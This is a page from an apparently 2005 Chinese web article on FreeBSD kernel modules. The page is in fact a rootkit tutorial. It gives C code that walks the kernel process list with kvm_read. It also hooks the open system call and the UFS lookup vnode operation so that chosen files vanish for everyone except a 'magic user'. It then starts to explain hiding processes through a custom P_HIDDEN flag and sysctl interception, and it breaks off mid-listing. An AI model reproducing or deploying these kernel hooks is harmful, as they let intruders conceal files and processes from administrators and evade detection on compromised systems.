Freebsd内核模块源码实现以及应用探秘

时间：2005-11-25 10:43:19 来源：作者：

�

如果你想读取队列的全部，你只要找到队列头然后用next指针来找到下一个元素（结构体），同样你可以获得其他的数据通过
这个struct 指针比如说用户的表示符(在这个结构中包含了uid,euid) 下面给出了一个例子（在listproc.c），当我们找到了allproc的地址,这个队列
的头就确定了
[...]

    kvm_read(kd,nl[0].n_value, &allproc, sizeof(struct proclist));  //allproc 是所有进程的队列头

    printf("PIDtUIDnn");

    for(p_ptr = allproc.lh_first; p_ptr; p_ptr = p.p_list.le_next) {

        /* read this proc structure */
    kvm_read(kd,(u_int32_t)p_ptr, &p, sizeof(struct proc)); //p_ptr指向结构proc 进程控制块

        /* read the user credential */
    kvm_read(kd,(u_int32_t)p.p_cred, &cred, sizeof(struct pcred));//p_cred 指向包含ruid，suid的结构pcred

        printf("%dt%dn", p.p_pid, cred.p_ruid);

    }

2.3.3 修改内核代码

用同样的方法我们可以来写内核代码了，man函数kvm_write可以得到更多相关内容，后面将会给出一个例子。如果你现在不耐烦了
请看一会tools/putjump.c吧

3. 通常应用

3.1 隐藏并重定向文件
一般最开始做的就是就是隐藏文件了，它也是最简单的，我们就从这里开始吧。

你的hook函数可以在不同的层次，简单的可以截获系统调用open,stat 等等深入点你可以hook底层具体文件系统的lookup函数。

3.1.1 通过系统调用

最普通的方法，嘿嘿，被许多工具使用过了，THC 的文档有具体描述
（这篇文章的连接是http://www.thehackerschoice.com/papers/bsdkern.html）
这种方法通过截获open,stat,chmod系统调用来针对特别的文件，这种方法是最简单的。通过你提供的的新的系统调用new_open
检查带有某些特定的字符，来决定返回没有还是调用原来的open系统调用，例子来自于module/file-sysc.c:
    int
    new_open(struct proc *p, register struct open_args *uap)
    {
        char name[NAME_MAX];
        size_t size;

        /* get the supplied arguments from userspace */
        if(copyinstr(uap->path, name, NAME_MAX, &size) == EFAULT)
            return(EFAULT);

        /* if the entry should be hidden and the user is not magic, return not found */
        if(file_hidden(name) && !(is_magic_user(p->p_cred->pc_ucred->cr_uid))) //检查特定文件名和用户uid
            return(ENOENT);
         return(open(p,uap));
    }

还有一些类似的系统调用，只有getdirentries有一些特别，因为它返回一个目录列表，所以要多做一些变换（这个以前引起了不少的
讨论，在linux lkm中）。THC 的文档有具体描述
（这篇文章的连接是http://www.thehackerschoice.com/papers/bsdkern.html）

或者你可以通过hook地层具体文件系统的某些函数，这种方法的好处就是不用修改系统调用表并且不被众多的系统调用所受限制。因为
这些函数最终会调用它。在这里你还可以通过判断更多的条件来决定是否隐藏这个文件。
每种文件系统的vop（操作函数结构）决定了对不同种类操作所调用的函数，ufs文件系的vop可以在/sys/ufs/ufs/ufs_vnops.c
找到,procfs文件系统的vop可以在/sys/miscfs/procfs/procfs_vnops.c中找到，其它文件系统的可以找到。当你改变
lookup的同时，也要改变相应的cached lookup 函数（因为有缓存呀，找的时候先找缓存）
下面展示了一个例子代码来自module/file-ufs.c

int new_ufs_lookup(struct vop_cachedlookup_args *ap)
    {

        struct componentname *cnp = ap->a_cnp;

        if(file_hidden(cnp->cn_nameptr) &&
            !(is_magic_user((cnp->cn_cred)->cr_uid))) {
            mod_debug("Hiding file %sn",cnp->cn_nameptr);
            return(ENOENT);
        }

        return(old_ufs_lookup(ap));
    }

在模块加载函数中

extern vop_t **ufs_vnodeop_p;
//static vop_t **ufs_vnodeop_p指向static struct vnodeopv_entry_desc ufs_vnodeop_entries[]
//在文件/sys/ufs/ufs/ufs_vnops.c
    vop_t *old_ufs_lookup;

    static int
    load(struct module *module, int cmd, void *arg)
    {
        switch(cmd) {
            case MOD_LOAD:
                mod_debug("Replacing UFS lookupn");
                old_ufs_lookup = ufs_vnodeop_p[VOFFSET(vop_lookup)];
                ufs_vnodeop_p[VOFFSET(vop_lookup)] = (vop_t *) new_ufs_lookup;
                break;

            case MOD_UNLOAD:
                mod_debug("Restoring UFS lookupn");
                ufs_vnodeop_p[VOFFSET(vop_lookup)] = old_ufs_lookup;
                break;

            default:
                error = EINVAL;
                break;
        }
        return(error);
    }
看比替换系统调用费不了多点事，同样你需要修改ufs_readdir来防止getdirentries

3.1.3 概要评论

文件重定向可以用多种方法来实现，你可以用指定的文件来代替被请求的文件，比如execve特定的文件，通过截获execve.
通常都很简单了，也许你想扩展用户空间，可以通过vm_map_find来实现 CY 中有一个例子展示。

3.2  隐藏进程

还有一个通常要做得事就是隐藏进程，为了达到这个目的，你需要截获很多获得进程信息的方法，当然你也想保持对特定进程
的追踪。每个进程的信息都存储在proc结构中，定义在/sys/sys/proc.h ，结构中有一个标志域p_flag 可以对进程设定
特殊的标志，所以我们设定一个新的标志#define P_HIDDEN 0x8000000 这样当一个进程被隐藏时，我们通过这个标志
重新发现这个进程，module/control.c 有一个例子来展示。
如果你用 ps ,它将会调用kvm_getprocs，它将通过带有下面的参数来调用sysctl
name[0] = CTL_KERN
name[1] = KERN_PROC
name[2] = KERN_PROC_PID, KERN_PROC_ARGS etc
name[3] can contain the pid in case information about only one process is requested.

name是一个数组包含了mib变量（类似于snmp mib),描述了请求的信息，例如，啥样的sysctl操作和具体的请求，下面包含了请求
的子类型（相对KERN_PROC)来说
/*
* KERN_PROC subtypes
*/
#define KERN_PROC_ALL           0       /* everything */
#define KERN_PROC_PID           1       /* by process id */
#define KERN_PROC_PGRP          2       /* by process group id */
#define KERN_PROC_SESSION       3       /* by session of pid */
#define KERN_PROC_TTY           4       /* by controlling tty */
#define KERN_PROC_UID           5&nbs

2/7 |‹ ‹‹ 1 2 3 4 5 6 ›› ›|

来顶一下

返回首页

相关文章

无相关信息

栏目更新

栏目热门